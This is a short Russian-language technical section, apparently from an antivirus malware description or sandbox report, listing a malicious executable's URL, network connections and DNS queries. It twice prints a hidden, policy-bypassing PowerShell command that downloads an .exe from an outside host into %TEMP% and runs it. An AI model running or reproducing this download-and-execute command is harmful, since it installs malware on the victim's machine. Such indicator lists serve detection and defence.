Техническая информация
- https://a.cuntflaps.me/jo73h.exe как %temp%\\sheghst.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.cuntflaps.me/Jo73h.exe','%TEMP%\\sheghst.exe') & %TEMP%\\sheghst.exe
- 'a.###tflaps.me':443
- 'a.###tflaps.me':443
- DNS ASK a.###tflaps.me
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.cuntflaps.me/Jo73h.exe','%TEMP%\\sheghst.exe') & %TEMP%\\sheghst.exe' (со скрытым окном)